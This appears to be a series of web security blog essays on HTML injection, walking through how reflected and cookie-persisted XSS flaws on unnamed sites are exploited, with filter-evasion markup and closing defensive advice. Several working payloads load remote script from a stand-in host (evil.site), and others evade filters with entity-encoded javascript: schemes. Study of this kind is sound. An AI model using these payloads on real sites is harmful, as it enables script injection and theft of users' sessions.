This example targets two URL parameters used as arguments to a function that expects the start and end of a time period. Forget time, we’d like to start an attack and end with its success.

Here’s a version of the link with numeric arguments:

https://web.site/TimeZone.aspx?start=1&end=2

The app uses these values inside a <script> block, as follows:

<script>
var start = 1,
    end = 2;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

The “normal” attack is simple:

https://web.site/TimeZone.aspx?start=alert(9);//&end=2

This results in a successful alert(), but the app has some sort of silly check that strips the end value if it’s not greater than the start. Thus, you can’t have start=2&end=1. And the comparison always fails if you use a string for start, because end will never be greater than whatever the string is cast to (likely zero). At least the devs remembered to enforce numeric consistency in spite of security deficiency.

<script>
var start = alert(9);//,
    end = ;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

But that’s inelegant compared with the attention to detail we’ve been advocating for exploit creation. The app won’t assign a value to end, thereby leaving us with a syntax error. To compound the issue, the developers have messed up their own code, leaving the browser to complain:

ReferenceError: Can’t find variable: $

Let’s see what we can do to help. For starters, we’ll just assign start to end (internally, the app has likely compared a string-cast-to-number with another string-cast-to-number, both of which fail identically, which lets the payload through). Then, we’ll resolve the undefined variable for them — but only because we want a clean error console upon delivering the attack.

https://web.site/TimeZone.aspx?start=alert(9);//&end=start;$=null

<script>
var start = alert(9);//,
    end = start;$=null;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

What’s interesting about “two factor” vulns like this is the potential for using them to bypass validation filters.

https://web.site/TimeZone.aspx?start=window["ale"/*&end=*/%2b"rt"](9)

<script>
var start = window["ale"/*,
    end = */+"rt"](9);

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>
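The way the two fragments recombine can be checked without a browser. In this sketch the template, the per-parameter filter, and the stub window object are all hypothetical; the template simply mirrors how the page appears to reflect start and end.

```javascript
// Hypothetical template that mirrors how the page reflects both parameters.
function renderVars(start, end) {
  return "var start = " + start + ",\n    end = " + end + ";";
}

// Hypothetical filter that inspects each parameter on its own.
function perParameterFilter(value) {
  return !/alert/i.test(value); // true means "looks fine"
}

const start = 'window["ale"/*';
const end = '*/+"rt"](9)';
const rendered = renderVars(start, end);
console.log(rendered);

// Evaluate the rendered statement against a stub window object.
// The comment swallows the text between the two values, joining the halves.
const stubWindow = { alert: (n) => "alert called with " + n };
const result = new Function("window", rendered + "\nreturn start;")(stubWindow);
console.log(result);
```

Neither parameter contains the word the filter is looking for, yet the page ends up calling it.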

Rather than think about different ways to pop an alert() in someone’s browser, think about what could be possible if jQuery were already loaded in the page. Thanks to JavaScript’s design, it doesn’t even hurt to pass extra arguments to a function:

https://web.site/TimeZone.aspx?start=$["getSc"%2b"ript"]("http://evil.site/"&end=undefined)

<script>
var start = $["getSc"+"ript"]("http://evil.site/",
    end = undefined);

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

And if it’s necessary to further obfuscate the payload we might try this:

https://web.site/TimeZone.aspx?start=%22getSc%22%2b%22ript%22&end=$[start]%28%22//evil.site/%22%29

<script>
var start = "getSc"+"ript",
    end = $[start]("//evil.site/");

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

Maybe combining two parameters into one attack reminds you of the theme of two hearts from 80s music. Possibly U2’s War from 1983. I never said I wasn’t gonna tell nobody about a hack like this, just like that Stacey Q song a few years later: two of hearts, two hearts that beat as one. Or Phil Collins’ Two Hearts two years after that.

Although, if you forced me to choose between two hearts that beat as one, I’d choose a Timelord, of course. In particular, someone that preceded all that music: Tom Baker. Jelly Baby, anyone?

A True XSS That Needs To Be False

It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort than breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:

https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href="mailto:support@web.site?subject=error reference: "onmouseover=alert(9);a="">support@web.site</a>

Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element — well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="';
}
</script>

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:

https://web.site/UnknownError.aspx?id=%22onmouseover=alert(9);a=%22
https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.
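
The mismatch between the two strings can be reproduced outside the browser. This sketch assumes the standard URL class (available in Node and in browsers) serializes the query much as location.href does.

```javascript
// The string as the server wrote it into the anti-framing script.
const reflected = 'https://web.site/UnknownError.aspx?id="onmouseover=alert(9);a="';

// The URL parser percent-encodes the quotation marks when it serializes the query.
const serialized = new URL(reflected).href;

console.log(serialized);
console.log(serialized != reflected); // the inequality that triggers the redirect
```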

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.

The new payload is

'+alert(9)&&null=='

Which results in this:

<script type="text/javascript">
if (window.top.location != 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='') {
    window.top.location.href = 'https://web.site/UnknownError.aspx?id='+alert(9)&&null=='';
}
</script>

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:

undefined==''
[]!=''
[]===''
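
The operator precedence at work here, and the alternate tests, can be checked with a quick sketch. The alert() below is a stub that records its argument, and topLocation is an assumed placeholder for window.top.location.

```javascript
const alertLog = [];
const alert = (value) => { alertLog.push(value); }; // stub for the browser's alert()
const topLocation = 'https://web.site/UnknownError.aspx?id=x'; // assumed placeholder

// Same shape as the injected statement. It groups as:
// (topLocation != 'url' + alert(9)) && (null == '')
const redirect = topLocation != 'https://web.site/UnknownError.aspx?id=' + alert(9) && null == '';

console.log(alertLog); // alert(9) ran while the string was being built
console.log(redirect); // the right-hand test forces the whole condition to false

// The alternate right-hand tests from the list above.
const alternates = [undefined == '', [] != '', [] === ''];
console.log(alternates);
```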

This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with different execution contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page — URL encoding would have been a logical step.
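
As a rough sketch of that URL encoding step, assume the page ran the parameter through something like the hypothetical percentEncodeStrict() below before writing it into the script. The extra replace() matters because encodeURIComponent leaves the apostrophe (and a few other characters) untouched.

```javascript
// encodeURIComponent does not encode ! ' ( ) * so those are handled separately.
function percentEncodeStrict(value) {
  return encodeURIComponent(value).replace(
    /[!'()*]/g,
    (ch) => '%' + ch.charCodeAt(0).toString(16).toUpperCase()
  );
}

const payload = "'+alert(9)&&null=='";
const encodedPayload = percentEncodeStrict(payload);

console.log(encodedPayload);
```

With the apostrophes encoded, the payload can no longer terminate the string literal in the if statement.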

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.


HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of a hidden input field. In the following example, note that the quotation mark has not been filtered or encoded.

http://web.site/search?sortOn=x"

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling characters by including a <z" sequence to consume them. A <z> tag with an empty attribute is harmless.

http://web.site/search?sortOn=x"><script>alert(9)</script><z"

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of HTML5’s autofocus attribute, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, 8.1.2.3 Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but no instructions on how to handle this error condition. Without further instructions, it’s not clear how a browser should handle multiple attribute names. Ambiguity leads to security problems; it’s to be avoided at all costs.

From the spec, 8.2.4.35 Attribute name state

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines its parsing rules in section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >
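
The first-attribute-wins rule is simple enough to model. The sketch below is a simplified illustration rather than a real tokenizer, and effectiveAttributes() is a hypothetical helper that takes attributes in document order.

```javascript
// Simplified model of the tokenizer rule: the first attribute with a given
// name (compared case-insensitively) is kept and later duplicates are dropped.
function effectiveAttributes(pairs) {
  const kept = new Map();
  for (const [name, value] of pairs) {
    const key = name.toLowerCase();
    if (!kept.has(key)) kept.set(key, value);
  }
  return kept;
}

// Injection lands after the developer's type attribute: the "cast" is dropped.
const typeFirst = effectiveAttributes([
  ['type', 'hidden'], ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
]);

// Injection lands before the developer's type attribute: the "cast" wins.
const typeLast = effectiveAttributes([
  ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['autofocus', ''], ['onfocus', 'alert(9)//"'],
  ['type', 'hidden'],
]);

console.log(typeFirst.get('type'), typeLast.get('type'));
```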

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise.” Look for flaws in modern browsers where this trick works (e.g. maybe a compatibility mode or not using an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and a member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encodings like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)

A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment — which doesn’t make a round trip to the web site — isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

http://web.site/page.do?locale=en_US

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message, as follows:

http://web.site/page.do?locale=en_US%22%3E%3Cscript%3Ealert%289%29%3C/script%3E

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%3Ealert(9)%3C/script%3E%0A%0D

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body> :

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&#034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

">

And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&#034;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

"></span>

And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example; we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script>alert(9)</script>

" xml:lang="en-US">

<script>alert(9)</script>

">
<head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!--  Include the Reference Page Tag script -->
<!--//BEGIN REFERENCE PAGE TAG SCRIPT-->
<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US"&gt;

&lt;script&gt;alert(9)&lt;/script&gt;

';
</script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

http://web.site/page.do?locale=en_US">%0A%0D';alert(9)//

Too bad the apostrophe character (') remains encoded:

<script type="text/javascript">
            var v = {};
            v["v_locale"] = 'en_US&#034;&gt;

&#039;;alert(9)//';
</script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

http://web.site/page.do?locale=en_US%22%3E%0A%0D%3Cscript%20src=%22http://evil.site/%22%3E%3C/script%3E%0A%0D

As expected, the page.do’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&#034;&gt;

&lt;script src=&#034;http://evil.site/&#034;&gt;&lt;/script&gt;

">

But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by evil.site.

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">

<script src="http://evil.site/"></script>

" xml:lang="en-US">

<script src="http://evil.site/"></script>

">
<head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload — it’s just

http://web.site/contactUs.do

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A;
        JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
        sessionLocale="en_US\">  <script src=\"http://evil.site/\"></script>  ";
        exScreenRes=done

Sometime between the request to page.do and the contact page the site decided to take the locale parameter from page.do and place it in a cookie. Then, the site took the cookie presented in the request to the contact page, wrote it into the HTML (on the server side, not via client-side JavaScript), and let the user specify a custom locale. The locale isn’t as picturesque as Hogwarts, nor as destitute as District 12, but Hermione and Katniss would rip apart a vuln like this.
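
The cookie deserved the same treatment the URL parameter received on page.do. Here is a minimal sketch of the difference, assuming the contact page builds its <html> tag from a template. The render functions and escapeHtml() are hypothetical stand-ins, not the site's code.

```javascript
// Minimal HTML encoder for the characters that matter inside an attribute value.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical template that trusts the cookie.
function renderHtmlTagUnsafe(locale) {
  return `<html xmlns="http://www.w3.org/1999/xhtml" lang="${locale}">`;
}

// Same template with output encoding applied.
function renderHtmlTagEncoded(locale) {
  return `<html xmlns="http://www.w3.org/1999/xhtml" lang="${escapeHtml(locale)}">`;
}

// Value as it might arrive in the sessionLocale cookie.
const sessionLocale = 'en_US">\n<script src="http://evil.site/"></script>\n';

console.log(renderHtmlTagUnsafe(sessionLocale));
console.log(renderHtmlTagEncoded(sessionLocale));
```

A cookie is client-side data like any other; where it came from doesn't change how it should be written into the page.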

Insistently Marketing Persistent XSS

Want to make your site secure? Write secure code. Want to make it less secure? Add someone else’s code to it. Even better, do it in the “cloud.”

The last few HTML injection articles here demonstrated the reflected variant of the attack. The exploit appears within the immediate response to the request that contains the XSS payload. These kinds of attacks are also ephemeral because the exploit disappears once the victim browses away from the infected page. The attack must be re-delivered for every visit to the vulnerable page.

A persistent HTML injection is more insidious. The web site still reflects the payload into a page, but not necessarily in the immediate response to the request that delivered the payload. You have to find the payload, e.g. the friendly alert(), in some other area of the app. In many cases the payload only needs to be delivered once. Any subsequent visit to the page where it’s reflected exposes the visitor to the exploit. This is very dangerous when the page has a one-to-many relationship where one attacker infects the page and many users visit the page via normal “safe” links that don’t have an XSS payload.

Persistence comes in many guises and durations. Here’s one that associates the persistence with a cookie.

Our example of the day decided to track users for marketing and advertising purposes. There’s little reason to love user tracking (unless 95% of your revenue comes from it), but you might like it a little more if you could use it for HTML injection.

The hack starts off like any other reflected XSS test. Another day, another alert:

http://web.site/page.aspx?om=alert(9)

But the response contains nothing interesting. It didn’t reflect any piece of the payload, not even in an HTML encoded or stripped version. And — spoiler alert — not in the following script block:

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop4="quote";
s.events="event2";
s.pageName="quote1";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

But we’re not at the point of nothing ventured, nothing gained. We’re just at the point of nothing reflected, something might still be wrong.

So we poke around at some more links on the site. Just visiting them as any user might without injecting any new payloads, working under the assumption that the payload could have found a persistent lair to curl up in and wait for an unsuspecting victim.

Sure enough we find a reflection in an (apparently) unrelated link. Note that the payload has already been delivered. This request has no indicators of XSS:

http://web.site/wacky/archives/2012/cute_animal.aspx

We find the alert() nested inside a JavaScript variable where, sadly, it remains innocuous and unexploited. For reasons we don’t care about, a comment warns us not to ALTER ANYTHING BELOW THIS LINE!

You don’t have to shout. We’ll just alter things above the line.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17="alert(9)";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

There are plenty of fun ways to inject into JavaScript string concatenation. We’ll stick with the most obvious plus (+) operator. To do this we need to return to the original injection point and alter the payload (just don’t touch ANYTHING BELOW THIS LINE!).

http://web.site/page.aspx?om="%2balert(9)%2b"

We head back to the cute_animal.aspx page to see how the payload fared. Before we can click to Show Page Source we’re greeted with that happy hacker greeting, the friendly alert() window.

<script language="JavaScript" type="text/javascript">//<![CDATA[<!--/* [ads in the cloud] Variables */
s.prop17=""+alert(9)+"";
s.pageName="ar_2012_cute_animal";
if(s.products) s.products = s.products.replace(/,$/,'');
if(s.events) s.events = s.events.replace(/^,/,'');
/****** DO NOT ALTER ANYTHING BELOW THIS LINE ! ******/
var s_code=s.t();if(s_code)document.write(s_code);//-->//]]></script>

After experimenting with a few variations on the request to the reflection point (the cute_animal.aspx page) we narrow the persistent carrier to a cookie value. The cookie is a long string of hexadecimal digits whose length and content do not change between requests. This is a good hint that it’s some sort of UUID that points to a record in a data store that contains the XSS payload from the om variable. (The cookie’s unchanging nature implies that the payload is not inserted into the cookie, encrypted or otherwise.) Get rid of the cookie and the alert no longer appears.

The cause appears to be string concatenation where the s.prop17 variable is assigned a value associated with the cookie. It’s a common, basic, insecure design pattern.
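
To make the pattern concrete, here is a sketch that contrasts concatenation with serializing the value as a JavaScript string literal. Both render functions are hypothetical guesses at the shape of the tracking code, and the alert() passed in is a stub that only counts calls.

```javascript
// Vulnerable pattern: the stored value is concatenated between double quotes.
function renderByConcatenation(value) {
  return 's.prop17="' + value + '";';
}

// Alternative sketch: serialize the value as a string literal.
// Escaping "<" also keeps a literal "</script>" from ending the script block.
function renderBySerialization(value) {
  return 's.prop17=' + JSON.stringify(value).replace(/</g, '\\u003c') + ';';
}

const storedValue = '"+alert(9)+"';

// Runs a generated statement with a stub "s" object and a stub alert().
function run(statement) {
  const calls = [];
  const s = {};
  new Function('s', 'alert', statement)(s, (arg) => { calls.push(arg); });
  return { prop17: s.prop17, alertCalls: calls.length };
}

const concatenated = run(renderByConcatenation(storedValue));
const serializedResult = run(renderBySerialization(storedValue));

console.log(concatenated);
console.log(serializedResult);
```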

So, we have a persistent HTML injection tied to a user-tracking cookie. A diminishing factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice if we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Implicit HTML, Explicit Injection

When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.

It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when they encounter unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.

One of HTML5’s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies, giving us a world where sites worked well with one and only one version of Internet Explorer (or Mozilla, etc.). A great deal of blame lies at the feet of site developers who refused to consider good HTML design patterns in favor of the principle of Code Relying on Advanced Persistent Stubbornness.

Parsing Disharmony

Untidy markup is a security hazard. It makes HTML injection vulnerabilities more difficult to detect and block, especially for regex-based countermeasures.

Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on, anything other than a narrowly-focused regex becomes unwieldy at best.

First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the img tag:

<img/alt=""src="."onerror=alert(9)>

Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering strange parsing territory. For some sites, this will be a trip to the undiscovered country.
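
A small sketch shows how a filter that assumes conventional spacing fares against this syntax. The naiveImgFilter pattern is a hypothetical example of such a rule, not taken from any particular product.

```javascript
// Hypothetical filter that expects whitespace after the element name and
// before the onerror attribute.
const naiveImgFilter = /<img\s[^>]*\sonerror\s*=/i;

const conventional = '<img alt="" src="." onerror=alert(9)>';
const compact = '<img/alt=""src="."onerror=alert(9)>';

const caughtConventional = naiveImgFilter.test(conventional);
const caughtCompact = naiveImgFilter.test(compact);

console.log(caughtConventional, caughtCompact);
```

The filter catches the conventional tag and misses the compact one, even though a browser treats both as an img element with an onerror handler.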

Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The id attribute has an unquoted value, so we separate it from the subsequent attribute with a space. The href has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we put onclick immediately after.

<a""id=a href=""onclick=alert(9)>foo</a>

User-Agents try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:

<script/<a>alert(9)</script> 

We can adjust the end tag if there’s a filter watching for </script>. Note there is a space between the last </script and </a>.

<script/<a>alert(9)</script </a>

Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s %0d%0a into \r\n (carriage return, line feed) when it places the payload into HTML, then the browser might execute the alert function.

<script%0d%0aalert(9)</script>

Or you might be able to separate the lack of closing > character from the alert function with an intermediate HTML comment:

<script%20<!--%20-->alert(9)</script>

The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a javascript: scheme with a line feed.

<div id=mycode style="BACKGROUND: url('java 
script:eval(document.all.mycode.expr)')" expr="alert(9)"></div>

Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.

<a href=""&amp;/onclick=alert(9)>foo</a>

HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three JavaScript schemes use an entity for the “s” character:

java&#115;cript:alert(9)
java&#x73;cript:alert(9)
java&#x0073;cript:alert(9)

The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.
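
The ordering problem can be sketched in a few lines. The decoder below is deliberately simplified (numeric character references only), and hasJavascriptScheme() is a hypothetical check standing in for whatever test a filter applies.

```javascript
// Simplified decoder: handles decimal and hex numeric character references only.
function decodeNumericEntities(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, body) => {
    const codePoint = body[0].toLowerCase() === 'x'
      ? parseInt(body.slice(1), 16)
      : parseInt(body, 10);
    return String.fromCodePoint(codePoint);
  });
}

// Hypothetical scheme check.
function hasJavascriptScheme(value) {
  return /^\s*javascript:/i.test(value);
}

const hrefs = [
  'java&#115;cript:alert(9)',
  'java&#x73;cript:alert(9)',
  'java&#x0073;cript:alert(9)',
];

for (const href of hrefs) {
  const checkedBeforeDecode = hasJavascriptScheme(href);
  const checkedAfterDecode = hasJavascriptScheme(decodeNumericEntities(href));
  console.log(href, checkedBeforeDecode, checkedAfterDecode);
}
```

Checking before decoding misses all three; checking after decoding catches them. The check has to see the same data the browser will act on.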

Security

User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.

  • Fix the vulnerability, not the exploit.
    It’s not uncommon for developers to blacklist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
  • Test with multiple browsers.
    A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
  • Prefer parsing to regex patterns.
    Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
  • Encode characters.
    You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like < and > and prevent quotes from breaking attribute values.
  • Enforce rules strictly.
    Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.

